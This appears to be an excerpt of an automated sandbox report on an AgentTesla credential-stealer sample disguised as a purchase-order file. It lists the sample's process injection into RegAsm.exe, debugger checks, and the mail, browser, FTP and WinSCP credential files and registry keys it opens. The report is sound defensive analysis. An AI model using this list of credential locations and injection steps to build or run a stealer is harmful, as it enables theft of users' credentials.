Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF65797BD68
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657960C0C GetProcessHeap,HeapAlloc,InitializeCriticalSectionAndSpinCount, 26_2_00007FF657960C0C
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00746946 KiUserExceptionDispatcher,LdrInitializeThunk, 10_2_00746946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797B530 SetUnhandledExceptionFilter, 26_2_00007FF65797B530
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF65797B798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797BF4C SetUnhandledExceptionFilter, 26_2_00007FF65797BF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF65797BD68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657963BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF657963BFC

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A30000 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe' Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795E0C4 AllocateAndInitializeSid,FreeSid, 26_2_00007FF65795E0C4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError, 26_2_00007FF65795F884
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795418C cpuid 26_2_00007FF65795418C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe Code function: 25_2_00007FF7E3A88ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 25_2_00007FF7E3A88ED4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790F3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId, 26_2_00007FF65790F3E8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795D874 RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError, 26_2_00007FF65795D874

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR